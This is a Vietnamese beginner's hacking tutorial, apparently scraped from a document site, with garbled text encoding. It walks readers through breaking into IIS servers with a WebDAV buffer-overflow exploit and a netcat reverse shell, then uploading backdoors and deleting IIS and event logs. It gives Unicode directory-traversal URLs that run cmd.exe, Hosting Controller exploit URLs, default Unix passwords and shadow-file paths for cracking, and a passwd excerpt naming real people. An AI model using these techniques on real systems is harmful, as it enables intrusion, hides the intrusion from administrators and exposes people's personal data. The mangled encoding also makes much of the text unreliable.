/winnt/system32/cmd.exe?/c+ < == lỗi dòng thứ Đến bạn xâm nhập vào server nạn nhân , bạn sử dụng lệnh DOS mà khai thác thông tin Thông thường trang Web nằm thư mục vinetpub\wwwroot , bạn vào rồI cần thay index.html vớI tên hack by … Là , đừng quậy họ 50 ) Kỹ thuật hack server thông qua lỗi tràn đệm WebDAV : _ Giới thiệu : Giao thức World Wide Web Distributed Authoring and Versioning (WebDAV) tập hợp mở rộng cho giao thức HTTP dùng để cung cấp cách thức chuẩn cho việc biên tập quản lý file máy tính Internet Lỗi tràn đệm phát thành phần Windows 2000 sử dụng WebDAV cho phép kẻ cơng chiếm quyền điều khiển máy tính _ Chuẩn bị : Ngoài đồ nghề giới thiệu trước , bạn vào down thêm www32.brinkster.com/anhdenday/wb.zip extract để C:\ _ Khai thác : + Tìm trang Web dùng IIS 5.0 + Vào Dos , vào đặt NETCAT chế độ lắng nghe : CODE C:\>nx -vv -l -p 53 listening on [any] 53 Ta để lắng nghe cổng 53 tường lửa ko chặn cổng + Mở thêm sổ DOS + Ta sử dụng WebDAV vừa down c:\wb.exe [padding=1,2,3 ] VD : CODE C:\> webdav xxx.xxx.xxx.xxx 203.162.xxx.xxx 53 [Crpt] ntdll.dll exploit trough WebDAV by kralor [Crpt] www.coromputer.net && undernet #coromputer Checking WebDav on 'xxx.xxx.xxx.xxx' FOUND exploiting ntdll.dll through WebDav [ret: 0x00100010] Connecting CONNECTED Sending evil request SENT Now if you are lucky you will get a shell + Nếu may mắn bạn lấy shell máy chủ IIS Nếu máy tính dùng để cơng kết sau bạn có shell : CODE C:\>nc -vv -l -p 53 listening on [any] 53 connect to [203.162.xxx.xxx] from xxx.xxx.xxx.xxx[xxx.xxx.xxx.xxx] 1125 Microsoft Windows 2000 [Version 5.00.2195] (C) Copyright 1985-2000 Microsoft Corp C:\WINNT\system32> < OK thành công rùi :mellow: :mellow: :mellow: + Khi có shell việc ta sử dụng lệnh Unix để khai thác , sau up lên server vài backdoor , he he ( Sử dụng WinShell, Hack Defensed ok rùi ) + Sau làm xong ta xoá file log , để xác định file log ta thực câu truy vấn sau : CODE C:\WINNT\system32>reg query HKLM\SYSTEM\CurrentControlSet\Services\W3SVC\Parameters /v LogFileDirectory ! REG.EXE VERSION 2.0 kết xuất link để ta xác định file log : CODE HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W3SVC\Parameters LogFileDirectory REG_SZ C:\WINNT\System32\LogFiles He he , đường dẫn file log C:\WINNT\System32\LogFiles + Ta tạo file a.bat máy nạn nhân để thực việc xoá file log , ta đánh lệnh sau : CODE C:\WINNT\system32>echo iisreset /stop >a.bat ' tạm dừng server IIS C:\WINNT\system32>echo rd /q /s C:\WINNT\System32\LogFiles >>a.bat ' xóa nhật kí IIS C:\WINNT\system32>echo iisreset /start >>a.bat ' khởi động lại IIS C:\WINNT\system32>echo ce >>a.bat ' xóa nhật kí Event Log C:\WINNT\system32>echo del a.bat >>a.bat ' xóa file a.bat + Sau ta dùng lệnh sau flie a.bat làm việc : CODE C:\WINNT\system32>net time \xxx.xxx.xxx.xxx ' lấy thời gian máy chủ Nó cho kết VD sau : CODE Current time at \xxx.xxx.xxx.xxx is dd/mm/yy 3:00 PM The command completed successfully Như thờI gian tạI máy chủ 15:00 , ta cho file a.bat làm việc sau phút lệnh sau : CODE C:\WINNT\system32>at 15:05 a.bat Added a new job with job ID = Ta mặc đinh cho file a.bat tự động làm việc sau tuỳ vào thông số thời gian bạn đưa vào Ta thoát khỏi máy chủ lệnh : CODE C:\WINNT\system32>exit ' đóng kết nối sent 207, rcvd 746 + Lúc admin có tài thánh ko biết có người thâm nhập _ Sau bạn muốn quay lại server ta đột nhập trực tiếp thông qua backdoor bạn up lên _ Kèm theo file Wb.exe để thêm file : + xoafilelog.exe : dùng để xố file log server victim + wbscaniis.xpn : dùng để quét xem server victim có bị lỗi cho ta khai thác hay khơng , bạn tự tìm hiểu để sử dụng chúng ( Tham khảo từ viết seamoun ) 52 ) Tìm hiểu lỗ hổng Unicode Microsoft IIS : _Giới thiệu: Microsoft IIS phần mềm web server Nó chứa tất file website, làm chúng có hiệu lực cho người dùng internet Nhưng tất phần mềm khác, (đặc biệt Microsoft) có lỗ hỏng bảo mật Unicode IIS Microsoft, "khơng may" người quản trị lại không quan tâm đến việc cài đặt patch fix lỗi Trong hướng dẫn này, ta thảo luận cách mà lỗi hoạt động, Tại hoạt động Khi bạn viếng thăm website, địa file bạn xem giống sau: http://www.someserver.com/ Đây remote address web server, hiển thị address trình duyệt Bất kỳ truy cập internet Khi vào site này, web server đưa cho bạn file index, (index.html hay ) root folder web server Hầu hết root folder web server là: C:\inetpub\wwwroot Đây thư mục local web servers, nơi cất giữ tất trang website Vì bạn gõ địa sau: http://www.someserver.com/index.html Ở trình duyệt, web server đưa cho bạn local file nó: c:\inetpub\wwwroot\index.html Tơi hy vọng bạn khơng q nhàm chán, việc quan trọng bạn phải hiểu khác địa local remote Bây giờ, xảy ta muốn di chuyển cặp thư mục lên web server? Ta muốn di chuyển từ c:\inetpub\wwwroot Đến c:\ làm nào? Bạn gõ: http://www.someserver.com/c:\ Chú thích Web server bắt đầu qua local c:\inetpub\wwwroot Đối với thư mục riêng, bạn khơng thể có : thư mục, đỗ vỡ bạn nhận thông báo lỗi trình duyệt Tiếc q! khơng hoạt động Nếu quen với FTP, bạn biết lệnh DIRUP dùng để làm Lệnh để đến thư mục / / Nếu bạn thiết kế web hay mã html chắn bạn dùng nhiều Vì ta đặt lệnh lẫn nhau, giống sau http://www.someserver.com/ / / Và bắt đầu truy cập vào ổ đĩa c local server? Tốt, ta bắt đầu khai thác đây, người tạo IIS lại muốn tránh phiền phức, cách làm server từ chối loại yêu cầu này.Vì ta phải làm đây?Bạn có thử download file mà tên có khoảng trống chưa? Bạn có nhận thơng báo trình duyệt biến đổi khoảng trống thành %20 khơng? Hãy làm ví dụ Nếu bạn gõ trình duyệt: http://www.someserver.com/iis Unicode hole.txt Trình duyệt thay khoảng trống %20 : http://www.someserver.com/iis%20unicode%20hole.txt Và sau cho phép bạn download file Đó gì, trình duyệt lại phải làm thế? Máy tính hiểu khoảng trống Đơn giản chúng khơng làm thơi %20 Unicode cho ký tự ASCII mà ta hay gọi “khoảng trống” Ký tự ASCII ký tự mà ta thấy hình dùng máy tính Chỉ có Unicode cho ký tự ASCII Vì thế, bạn đưa khoảng trống vào trình duyệt, phải thay mà cho máy tính hiểu trước bắt đầu tìm kiếm Để tìm hiểu thêm ASCII bạn down : www32.brinkster.com/anhdenday/ascii.zip Từ trình duyệt biến đổi khoảng trống thành ký tự Unicode gửi chúng đến web server mà hiểu được, ta dùng ký tự Unicode để giải thích thứ ta muốn, web server hiểu chúng Không với khoảng trống Mà ta ... ip.address -t" Cách làm máy ping Để thay đổi kích thước ping làm sau: CODE "ping -l (size) địa_chỉ_ip " Cái ping làm gửi gói tin đến máy tính, sau xem xem gói tin xem xem sau gói tin quay trở lại, cách... + Cho phép ngườI khách làm khơng thể làm Website bạn + Quản lý user name passwd thành viên + Cung cấp dịch vụ Mail + Cung cấp trang liên kết thực tin nhắn qua lại thành viên + Cung cấp thông... : _ Trong SYN Attack, hacker gởi đến hệ thống đích loạt SYN packets với địa ip nguồn khơng có thực Hệ thống đích nhận SYN packets gởi trở lại địa khơng có thực chờ đợI để nhận thông tin phản

Ngày đăng: 31/01/2014, 22:18

Từ khóa liên quan

Mục lục

  • T bch: Nhiu bn Newbie cú hi tụi Hack l nh th no ? Lm sao hack ? Nhng cỏc bn ó quờn mt mt iu l cỏc bn cn phI cú kin thc mt cỏch tng quỏt , hiu cỏc thut ng m nhng ngi rnh v mng hay s dng . Riờng tụi thỡ cha tht gii bao nhiờu nhng qua nghiờn cu tụi cng ó tng hp c mt s kin thc c bn , mun chia s cho tt c cỏc bn , nhm cựng cỏc bn hc hi . Tụi s khụng chu trỏch nhim nu cỏc bn dựng nú quy phỏ ngI khỏc . Cỏc bn cú th copy hoc post trong cỏc trang Web khỏc nhng hóy in tiờn tỏc gi dI bi , tụn trng bi vit ny cng chớnh l tụn trng tụi v cụng sc ca tụi , ng thI cng tụn trng chớnh bn thõn cỏc bn . Trong ny tụi cng cú chốn thờm mt s cỏch hack , crack v vớ d cn bn , cỏc bn cú th ng dng th v nghiờn cu c nú hiu thờm , r khi bt gp mt t m cỏc bn khụng hiu thỡ hóy c bi ny bit , trong ny tụi cú s dng mt s ý ca bi vit m tụi thy rt hay t trang Web ca HVA , v cỏc trang Web khỏc m tụi ó tng ghộ thm . Xin cm n nhng tỏc gi ó vit nhng bi y . Bõy gi l vn chớnh . ==================================================== 1 . ) Ta cn nhng gỡ bt u ? Cú th nhiu bn khụng ng ý vi tụi nhng cỏch tt nht thc tp l cỏc bn hóy dựng HH Window 9X , rI n cỏc cỏi khỏc mnh hn ú l Linux hoc Unix , dI õy l nhng cỏi bn cn cú : + Mt cỏi OS ( cú th l DOS , Window 9X , Linux , Unit .) + Mt cỏi trang Web tt ( HVA chng hn hi`hi` ) + Mt b trỡnh duyt mng tt ( l Nescape , IE , nhng tt nht cú l l Gozzila ) + Mt cụng c chat tt ( mIRC ,Yahoo Mass ..) + Telnet ( hoc nhng cỏi tng t nh nmap ) + Cỏi quan trng nht m bt c ai mun tr thnh mt hacker l u phI cú mt chỳt kin thc v lp trỡnh ( C , C++ , Visual Basic , Pert ..) 2 . ) Th no l mt a ch IP ? _ a ch IP c chia thnh 4 s gii hn t 0 - 255. Mi s c lu bi 1 byte -> !P cú kicks thc l 4byte, c chia thnh cỏc lp a ch. Cú 3 lp l A, B, v C. Nu lp A, ta s cú th cú 16 triu i ch, lp B cú 65536 a ch. Vớ d: lp B vi 132.25,chỳng ta cú tt c cỏc a ch t 132.25.0.0 n 132.25.255.255. Phn ln cỏc a ch lp A ll s hu ca cỏc cụng ty hay ca t chc. Mt ISP thng s hu mt vi a ch lp B hoc C. Vớ d: Nu a ch IP ca bn l 132.25.23.24 thỡ bn cú th xỏc nh ISP ca bn l ai. ( cú IP l 132.25.x.) _ IP l t vit tt ca Internet Protocol, trờn Internet thỡ a ch IP ca mI ngi l duy nht v nú s I din cho chớnh ngI ú, a ch IP c s dng bi cỏc mỏy tớnh khỏc nhau nhn bit cỏc mỏy tớnh kt ni gia chỳng. õy l lớ do ti sao bn li b IRC cm, v l cỏch ngi ta tỡm ra IP ca bn. a ch IP cú th d dng phỏt hin ra, ngi ta cú th ly c qua cỏc cỏch sau : + bn lt qua mt trang web, IP ca bn b ghi li + trờn IRC, bt kỡ ai cng cú th cú IP ca bn + trờn ICQ, mi ngi cú th bit IP ca bn, thm chớ bn chn "do not show ip" ngi ta vn ly c nú + nu bn kt ni vi mt ai ú, h cú th gừ "systat n ", v bit c ai ang kt ni ờn h + nu ai ú gi cho bn mt email vi mt on mó java túm IP, h cng cú th túm c IP ca bn ( Ti liu ca HVA ) 3 . ) Lm th no bit c a ch IP ca mỡnh ? Run ỏnh lnh winipcfg ._ Trong Window : vo Start _ Trong mIRC : kt nI n mỏy ch sau ú ỏnh lnh /dns <your nick> _ Thụng qua mt s trang Web cú hin th IP . 4 . ) IP Spoofing l gỡ ? _ Mt s IP cú mc ớch xỏc nh mt thit b duy nht trờn th gii. Vỡ vy trờn mng mt mỏy ch cú th cho phộp mt thit b khỏc trao i d liu qua li m khụng cn kim tra mỏy ch. Tuy nhiờn cú th thay i IP ca bn, ngha l bn cú th gi mt thụng tin gi n mt mỏy khỏc m mỏy ú s tin rng thụng tin nhn c xut phỏt t mt mỏy no ú (tt nhiờn l khụng phi mỏy ca bn). Bn cú th vt qua mỏy ch m khụng cn phi cú quyn iu khin mỏy ch ú. iu tr ngi l ch nhng thụng tin phn hi t mỏy ch s c gi n thit b cú IP m chỳng ta ó gi mo. Vỡ vy cú th bn s khụng cú c s phn hi nhng thụng tin m mỡnh mong mun. Cú l iu duy nht m spoof IP cú hiu qu l khi bn cn vt qua firewall, trm account v cn du thụng tin cỏ nhõn! ( Ti liu ca HVA ) 5 . ) Trojan / worm / virus / logicbomb l cỏi gỡ ? _ Trojan : Núi cho d hiu thỡ õy l chng trỡnh ip viờn c ci vo mỏy ca ngI khỏc n cp nhng ti liu trờn mỏy ú gI v cho ch nhõn ca nú , Cỏi m nú n cp cú th l mt khu , accourt , hay cookie . tu theo ý mun ca ngI ci nú . _ virus : Núi cho d hiu thỡ õy l chng trỡnh vI nhng mó c bit c ci ( hoc lõy lan t mỏy khỏc ) lờn mỏy ca nn nhõn v thc hin nhng yờu cu ca mó ú , a s virut c s dng phỏ hoI d liu hoc phỏ hoI mỏy tớnh . _ worm : õy l chng trỡnh c lp cú th t nhõn bn bn thõn nú v lõy lan khp bờn trong mng .Cng ging nh Virut , nú cng cú th phỏ hoI d liu , hoc nú cú th phỏ hoI bờn trong mng , nhiu khi cũn lm down c mang ú . _ logicbomb : L chng trỡnh gi mt lỳc nhiu gúi d liu cho cựng mt a ch , lm ngp lt h thng , tt nghn ng truyn ( trờn server ) hoc dựng lm cụng c khng b I phng ( bom Mail ) ;) . 6 . ) PGP l gỡ ? _ PGP l vit tt ca t Pretty Good Privacy , õy l cụng c s dng s mó hoỏ chỡa khoỏ cụng cng bo v nhng h s Email v d liu , l dng mó hoỏ an ton cao s dng phn mm cho MS_DOS , Unix , VAX/VMS v cho nhng dng khỏc . 7 . ) Proxy l gỡ ? _Proxy cung cp cho ngi s dng truy xut internet vi nhng host n. Nhng proxy server phc v nhng nghi thc t bit hoc mt tp nhng nghi thc thc thi trờn dual_homed host hoc basion host. Nhng chng trỡnh client ca ngi s dung s qua trung gian proxy server thay th cho server tht s m ngi s dng cn giao tip. Proxy server xỏc nh nhng yờu cu t client v quyt nh ỏp ng hay khụng ỏp ng, nu yờu cu c ỏp ng, proxy server s kt ni vi server tht thay cho client v tip tc chuyn tip n nhng yờu cu t clientn server, cng nh ỏp ng nhng yờu cu ca server n client. Vỡ vy proxy server ging cu ni trung gian gia server v client . _ Proxy cho user truy xut dch v trờn internet theo ngha trc tip. Vi dual host homed cn phi login vo host trc khi s dng dch v no trờn internet. iu ny thng khụng tin li, v mt s ngi tr nờn tht vng khi h cú cm giỏc thụng qua firewall, vi proxy nú gii quyt c vn ny. Tt nhiờn nú cũn cú nhng giao thc mi nhng núi chung nú cng khỏ tin li cho user. Bi vỡ proxy cho phộp user truy xut nhng dch v trờn internet t h thng cỏ nhõn ca h, vỡ vy nú khụng cho phộp packet i trc tip gia h thng s dng v internet. ng i l giỏng tip thụng qua dual homed host hoc thụng qua s kt hp gia bastion host v screening rounter. ( Bi vit ca Z3RON3 ti liu ca HVA ) 8 . ) Unix l gỡ ? _ Unix l mt h iu hnh ( ging Window ) .Nú hin l h iu hnh mnh nht , v thõn thit vi cỏc Hacker nht . Nu bn ó tr thnh mt hacker tht s thỡ HH ny khụng th thiu i vI bn . Nú c s dng h tr cho lp trỡnh ngụn ng C . 9 . ) Telnet l gỡ ? _ Telnet l mt chng trỡnh cho phộp ta kt nI n mỏy khỏc thụng qua cng ( port ) . MI mỏy tớnh hoc mỏy ch ( server ) u cú cng , sau õy l mt s cng thụng dng : + Port 21: FTP + Port 23: Telnet + Port 25: SMTP (Mail) + Port 37: Time + Port 43: Whois _ Vớ d : bn cú th gI Telnet kt nI n mail.virgin.net trờn port 25 . 10 . ) Lm th no bit mỡnh ó Telnet n h thng Unix ? _ Ok , tụi s núi cho bn bit lm sao mt h thng Unix cú th cho hI bn khi bn kt ni ti nú . u tiờn , khi bn gi Unix , thụng thng nú s xut hin mt du nhc : Log in : , ( tuy nhiờn , ch vi nh vy thỡ cng cha chc chn õy l Unix c ngoI tr chỳng xut hin thụng bỏo trc ch log in : nh vớ d : Welcome to SHUnix. Please log in .) Bõy gi ta ang tI du nhc log in , bn cn phI nhp vo mt account hp l . Mt account thụng thng gm cú 8 c tớnh hoc hn , sau khi bn nhp account vo , bn s thy cú mt mt khu , bn hóy th nhp Default Password th theo bng sau : Account-------------------------Default Password Root-----------------------------------------------Root Sys------------------------------------------------Sys / System / Bin Bin-------------------------------------------------Sys / Bin Mountfsy------------------------------------------Mountfsys Nuuc-----------------------------------------------Anon Anon-----------------------------------------------Anon User------------------------------------------------User Games---------------------------------------------Games Install----------------------------------------------Install Demo-----------------------------------------------Demo Guest----------------------------------------------Guest 11 . )shell account l cỏi gỡ? _ Mt shell account cho phộp bn s dng mỏy tớnh nh bn nh thit b u cuI ( terminal ) m vI nú bn cú th ỏnh lnh n mt mỏy tớnh ang chy Unix , Shell l chng trỡnh cú nhim v dch nhng ký t ca bn gi n rI a vo thc hin lnh ca chng trỡnh Unix . VI mt shell account chớnh xỏc bn cú th s dng c mt trm lm vic mnh hn nhiu so vI cỏi m bn cú th tng tng n c . Bn cú th ly c shell account min phớ tI trang Web www.freeshell.com tuy nhiờn bn s khụng s dng c telnet cho n khi bn tr tin cho nú . 12 . ) Lm cỏch no bn cú th crack Unix account passwords ? _ Rt n gin , tuy nhiờn cỏch m tụi núi vI cỏc bn õy lc hu rI , cỏc bn cú th crack c chỳng nu cỏc bn may mn , cũn khụng thỡ cỏc bn c tham kho . _ u tiờn bn hóy ng nhp vo h thng cú s dng Unix nh mt khỏch hng hoc mt ngI khỏch ghộ thm , nu may mn bn s ly c mt khu c ct du trong nhng h thng chun nh : /etc/passwd mi hng trong mt h s passwd cú mt ti khon khỏc nhau , nú ging nh hng ny : userid:password:userid#:groupid#:GECOS field:home dir:shell trong ú : + userid = the user id name : tờn ng nhp : cú th l mt tờn hoc mt s . + password : mt mó . Dựng lm gỡ hn cỏc bn cng bit rI . + userid# : l mt s duy nht c thụng bỏo cho ngI ng ký khi h ng ký mI ln u tiờn . + groupid# : tng t nh userid# , nhng nú c dựng cho nhng ngI ang trong nhúm no ú ( nh nhúm Hunter Buq ca HVA chng hn ) + GECOS FIELD : õy l ni cha thụng tin cho ngI s dng , trong ú cú h tờn y , s in thoi , a ch v.v. . õy cng l ngun tt ta d dng crack mt mt khu . + home dir : l th mc ghi lI hot ng ca ngi khỏch khi h ghộ thm ( ging nh mc History trong IE vy ) + Shell : õy l tờn ca shell m nú t ng bt u khi ta login . _ Hóy ly file password , ly file text ó mó hoỏ v , sau ú bn dựng chng trỡnh "CrackerJack" hoc "John the Ripper" crack . _ Cỏc bn thy cng khỏ d phI khụng ? Sai bột , khụng d dng v may mn bn cú th crack c vỡ hu ht bõy gi h ct rt k , hóy c tip bn s thy khú khn ch no . 13 . ) shadowed password l cỏi gỡ ? _ Mt shadowed password c bit n l trong file Unix passwd , khi bn nhp mt mt khu , thỡ ngI khỏc ch thy c trỡnh n ca nú ( nh ký hiu X hoc * ) . Cỏi ny thụng bỏo cho bn bit l file passwd ó c ct gi ni khỏc , ni m mt ngI s dng bỡnh thng khụng th n c . Khụng l ta nh bú tay , d nhiờn l I vI mt hacker thỡ khụng rựi , ta khụng n c trc tip file shadowed password thỡ ta hóy tỡm file sao lu ca nú , ú l file Unshadowed . Nhng file ny trờn h thng ca Unix khụng c nh , bn hóy th vI ln lt nhng ng dn sau : CODE AIX 3 /etc/security/passwd ! or /tcb/auth/files/<first letter #of username>/<username> A/UX 3.0s /tcb/files/auth/?/ * BSD4.3-Reno /etc/master.passwd * ConvexOS 10 /etc/shadpw * ConvexOS 11 /etc/shadow * DG/UX /etc/tcb/aa/user/ * EP/IX /etc/shadow x HP-UX /.secure/etc/passwd * IRIX 5 /etc/shadow x Linux 1.1 /etc/shadow * OSF/1 /etc/passwd[.dir|.pag] * SCO Unix #.2.x /tcb/auth/files/<first letter *of username>/<username> SunOS4.1+c2 /etc/security/passwd.adjunct =##username SunOS 5.0 /etc/shadow <optional NIS+ private secure maps/tables/whatever> System V Release 4.0 /etc/shadow x System V Release 4.2 /etc/security/* database Ultrix 4 /etc/auth[.dir|.pag] * UNICOS /etc/udb =20 Trc du / u tiờn ca mt hng l tờn ca h thng tng ng , hóy cn c vo h thụng tht s bn mun ly rI ln theo ng dn phớa sau du /u tiờn . V cuI cựng l nhng account passwd m tụi tng crack c , cú th bõy gi nú ó ht hiu lc rI : CODE arif:x:1569:1000:Nguyen Anh Chau:/udd/arif:/bin/ksh arigo:x:1570:1000:Ryan Randolph:/udd/arigo:/bin/ksh aristo:x:1573:1000:To Minh Phuong:/udd/aristo:/bin/ksh armando:x:1577:1000:Armando Huis:/udd/armando:/bin/ksh arn:x:1582:1000:Arn mett:/udd/arn:/bin/ksh arne:x:1583:1000:Pham Quoc Tuan:/udd/arne:/bin/ksh aroon:x:1585:1000:Aroon Thakral:/udd/aroon:/bin/ksh arozine:x:1586:1000: Mogielnicki:/udd/arozine:/bin/bash arranw:x:1588:1000:Arran Whitaker:/udd/arranw:/bin/ksh bo m s bớ mt nờn pass ca h tụi xoỏ i v vo ú l ký hiu x , cỏc bn hóy tỡm hiu thụng tin cú c t chỳng xem . ( (Ht phn 1 )

  • 20 . ) Cookie l gỡ ? _ Cookie l nhng phn d liu nh cú cu trỳc c chia s gia web site v browser ca ngi dựng. cookies c lu tr di nhng file d liu nh dng text (size di 4k). Chỳng c cỏc site to ra lu tr/truy tỡm/nhn bit cỏc thụng tin v ngi dựng ó ghộ thm site v nhng vựng m h i qua trong site. Nhng thụng tin ny cú th bao gm tờn/nh danh ngi dựng, mt khu, s thớch, thúi quen...Cookie c browser ca ngi dựng chp nhn lu trờn a cng ca mỏy mỡnh, ko phi browser no cng h tr cookie. Sau mt ln truy cp vo site, nhng thụng tin v ngi dựng c lu tr trong cookie. nhng ln truy cp sau n site ú, web site cú th dựng li nhng thụng tin trong cookie (nh thụng tin liờn quan n vic ng nhp vo 1 forum...) m ngi ko phi lm li thao tỏc ng nhp hay phi nhp li cỏc thụng tin khỏc. Vn t ra l cú nhiu site qun lý vic dựng li cỏc thụng tin lu trong cookie ko chớnh xỏc, kim tra ko y hoc mó hoỏ cỏc thụng tin trong cookie cũn s h giỳp cho hacker khai thỏc vt qua cỏnh ca ng nhp, ot quyn iờu khin site . _ Cookies thng cú cỏc thnh phn sau : + Tờn: do ngi lp trỡnh web site chn + Domain: l tờn min t server m cookie c to v gi i + ng dn: thụng tin v ng dn web site m bn ang xem + Ngy ht hn: l thi im m cookie ht hiu lc . + Bo mt: Nu giỏ tr ny c thit lp bờn trong cookie, thụng tin s c mó hoỏ trong quỏ trỡnh truyn gia server v browser. + Cỏc giỏ tr khỏc: l nhng d liu c trng c web server lu tr nhn dng v sau cỏc giỏ tr ny ko cha cỏc khong trng, du chm, phy v b gii hn trong khong 4k. ( Ti liu ca Viethacker.net ) 21 . ) K thut ly cp cookie ca nn nhõn: _ Trc ht , cỏc bn hóy m notepad ri chộp on mó sau vo notepad ú :

  • 52 . ) Tỡm hiu v l hng Unicode trong Microsoft IIS : _Gii thiu: Microsoft IIS l mt phn mm web server. Nú cha tt c file ca mt website, v lm chỳng cú hiu lc cho mi ngi dựng trờn internet. Nhng nh tt c cỏc phn mm khỏc, (c bit l ca Microsoft) nú cú l hng bo mt Unicode trong IIS ca Microsoft, nhng "khụng may" nhng ngi qun tr thỡ li khụng quan tõm n vic ci t nhng patch fix li ú. Trong bi hng dn ny, ta tho lun v cỏch m li ny hot ng, v Ti sao nú hot ng c. Khi bn ving thm mt website, a ch ca file bn hin gi ang xem s ging nh sau: http://www.someserver.com/ õy l remote address ca web server, hin th trờn thanh address ca trỡnh duyt. Bt k ai cng cú th truy cp nú trờn internet. Khi vo site ny, web server s a cho bn file index, (index.html hay ) ca root folder web server. Hu ht nhng root folder ca mt web server l: C:inetpubwwwroot õy l th mc local ca web servers, ni ct gi tt c cỏc trang chớnh ca website. Vỡ vy nu bn gừ a ch sau: http://www.someserver.com/index.html trỡnh duyt, web server s a cho bn local file ca nú: c:inetpubwwwrootindex.html Tụi hy vng bn s khụng quỏ nhm chỏn, vic quan trng nht l bn phi hiu c s khỏc nhau gia a ch local v remote. Bõy gi, cỏi gỡ s xy ra nu ta mun di chuyn mt cp th mc lờn web server? Ta mun di chuyn t c:inetpubwwwroot n c: chỳng ta s lm nh th no? Bn khụng th gừ: http://www.someserver.com/c: Chỳ thớch Web server s bt u i qua local ca nú c:inetpubwwwroot i vi nhng th mc riờng, v do bn khụng th cú : trong th mc, nú s v v bn nhn c thụng bỏo li trong trỡnh duyt. Tic quỏ! nú khụng hot ng. Nu ó quen vi FTP, thỡ bn cng bit lnh DIRUP dựng lm gỡ. Lnh i n mt th mc trờn l /../ Nu bn thit k bt k web hay mó html no thỡ chc chn bn s dựng c rt nhiu. Vỡ th ta ch t lnh ln nhau, ging nh sau http://www.someserver.com/../../ V bt u truy cp vo a c local ca server? Tt, ta bt u khai thỏc õy, nhng ngi to IIS li mun trỏnh phin phc, bng cỏch lm server t chi loi yờu cu ny.Vỡ th ta phi lm gỡ õy?Bn cú bao gi th download mt file m trong tờn ca nú cú khong trng cha? Bn cú nhn c thụng bỏo l trỡnh duyt ó bin i khong trng ú thnh %20 khụng? Hóy lm 1 vớ d. Nu bn gừ cỏi ny trong trỡnh duyt: http://www.someserver.com/iisUnicode hole.txt Trỡnh duyt s thay th khong trng bng %20 : http://www.someserver.com/iis%20unicode%20hole.txt V sau ú mi cho phộp bn download file. ú l cỏi gỡ, v ti sao trỡnh duyt li phi lm nh th? Mỏy tớnh khụng th hiu c khong trng. n gin l chỳng khụng lm c vy thụi. %20 õy chớnh l Unicode cho ký t ASCII m ta hay gi l khong trng. Ký t ASCII l nhng ký t m ta thy trờn mn hỡnh khi dựng mỏy tớnh. Ch cú mt Unicode cho mi ký t ASCII. Vỡ th, khi bn a mt khong trng vo trỡnh duyt, nú phi c thay th bng cỏi gỡ m cho mỏy tớnh cú th hiu c trc khi nú bt u tỡm kim. tỡm hiu thờm v ASCII cỏc bn down ti : www32.brinkster.com/anhdenday/ascii.zip T khi trỡnh duyt bin i khong trng thnh ký t Unicode mi v gi chỳng n web server m cú th hiu c, ta cng cú th dựng ký t Unicode gii thớch bt c th gỡ ta mun, v web server s cng hiu c chỳng. Khụng ch vi khong trng. M ta cng cú th bin i lnh DIRUP thnh Unicode, v gi chỳng n server. Ta cn bin i du gch chộo (/) thnh /../../ trong Unicode. Unicode ca / l %5C . Tht l tuyt, nu sau ú tụi ch cn gừ http://www.someserver.com/..%5C..%5C/ v tụi cú th thy host c khụng? Khai thỏc õy, nhng cú mt vi lý do nú khụng hot ng. u tiờn, nu bn ó lm vi servers local c: Bn s cn mt vi th úng th mc. Web server s khụng lm nh vy cho bn. Vỡ vy chỳng ta cn m cmd.exe (du nhc DOS) ca server. Trong trỡnh duyt ca bn! Nhng chỳng ta s quay li vn ny sau. Th hai, khi server gii mó /..%5C.. %5C/ Nú s thnh /../../ m li b hn ch, v sau ú t chi yờu cu. Vỡ th ta cn phi lm gỡ, hay mó hoỏ Unicode ó mó húa ri mt ln na. Cú th bn s khụng theo tụi ngay bõy gi, nhng tụi s c gng gii thớch mt ln na. Ta cn mó hoỏ mi ký t ca chui Unicode ó cú. Xem bng di s hiu hn. CODE ASCII................................. UNICODE %........................................ %25 5.......................................... %35 C............................ .............%43 Vỡ vy khi ta mó húa ký t ASCII /..%5C.. %5C/ Sang Unicode, ta c ..%25%35%43..%25%35%43 V khi server c chui ký t ny, nú s tr lI /..%5C.. %5C/ ú khụng phi l lnh DIRUP bỡnh thng, nờn nú c cho phộp. Nhng cú mt vi th chỳng ta cn bit. Nh tụi ó cp trc, khi bn kt ni n mt web server, th mc root mc nh l wwwroot. Th mc ny nhng trang chớnh ca site. Nhng cú nhng th mc khỏc cho nhng trang web nh yu t scripts. Nhng th mc ny cú cha file m cú khỏ nhiu th quan trng trong web server. Vỡ vy khi vn dng server, ta cn lm nú t th mc m ta ó cú c quyn lm. iu ny khụng khú; Tụi ch mun bn hiu ti sao tụi thờm /scripts/ vo cui URL. Rt cuc, khi ta thi hnh lnh du nhc servers local dos prompt, ta cn thi hnh mt lnh cng trong cỏi ny. Ta mun hin th c: ? D thụi; ta ch cn lm vi th thut khỏc hn bn thng lm du nhc dos. Bt u cmd.exe theo cỏch sau: cmd.exe?/c+ ? = Mi th sau dũng i s ca lnh. /c = Thi hnh lnh, sau ú úng cmd.exe ( cho nú khụng chy mói) + = Thay th cho khong trng Cui cựng, ton b lnh rỏp li s nh sau: http://www.myserver.com/scripts/..%25%35%43..%25%35%43/winnt/system32/cmd.exe?/c+dir+c: V bn thy c c: ca servers bờn trong trỡnh duyt. Hehe? _ Chỳ thớch: Cú rt nhiu lnh Unicode khỏc cho ta thi hnh, nu cỏi ny khụng hot ng (cú th server ó fix c phn no) thỡ th ỏp dng nhng cỏch sau: CODE /msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+C: /_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+C: . ( Mt bi vit rt cht lng ca LeonHart bờn www.whatvn.com ) 53 . ) K thut hack Hosting controller : _Tỡm site b li : vo Google.com ỏnh vo mt trong cỏc t khoỏ sau : + copyright Hosting Controller . + allinurl:/advadmin . + allinurl:/admin . Sau khi tỡm c ta th xột trang Web ú cú b li hay ko bng cỏch s dng 2 on code : CODE http://www.victim.com/advwebadmin*hoacadmin*/stats/statsbrowse.asp?filepath=c:&Opt=3 ( Lnh ny xem a ca victim ) www.victim.com/advwebadmin/autosignup/newwebadmin.asp ( Lnh ny to mt free hosting ) Nu nh 2 lnh trờn cựng thc hiờn c thỡ ta cú th khai thỏc chỳng c ri ú , he he . _ Cỏch khai thỏc : + Vỡ to c hosting nờn ta cú th upload c file vụ t , cỏc bn hóy chỳ ý th xem a ch m ct cỏc file ta va upload lờn õu ( bng cỏch nhỡn vo thanh statup ) . + Tip theo l ta lm sao 